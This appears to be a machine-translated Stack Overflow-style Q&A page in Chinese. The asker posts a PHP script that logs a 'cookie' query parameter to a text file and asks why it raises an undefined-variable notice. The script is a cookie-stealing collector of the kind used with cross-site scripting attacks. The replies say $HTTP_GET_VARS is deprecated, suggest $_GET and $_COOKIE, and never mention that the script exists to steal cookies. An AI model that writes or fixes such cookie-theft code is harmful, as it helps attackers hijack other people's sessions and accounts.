2013-10-02 68 views
0
<?php 
$cookie = $HTTP_GET_VARS["cookie"]; 
$steal = fopen("cookiefile.txt", "a"); 
fwrite($steal, $cookie ."\n"); 
fclose($steal); 
?> 

雖然執行此代碼我得到這個錯誤:

Notice: Undefined variable: HTTP_GET_VARS in line 2

請幫我

+6

'$ HTTP_GET_VARS'一直棄用** LONG **時間。 **不要使用它**。基本上,你的代碼在你寫代碼之前就已經過時了。 –

+1

$ HTTP_GET_VARS已被替換爲$ _GET –

+0

如果您想提取cookie數據,可以使用'$ _COOKIE []' – 2013-10-02 18:58:15

回答

3

$HTTP_GET_VARS["cookie"];犯規存在,這就是問題所在......

注:

$HTTP_GET_VARS [deprecated]改爲使用$_GET。 此外,如果你試圖讓一個cookie,你應該使用$_COOKIE["name"]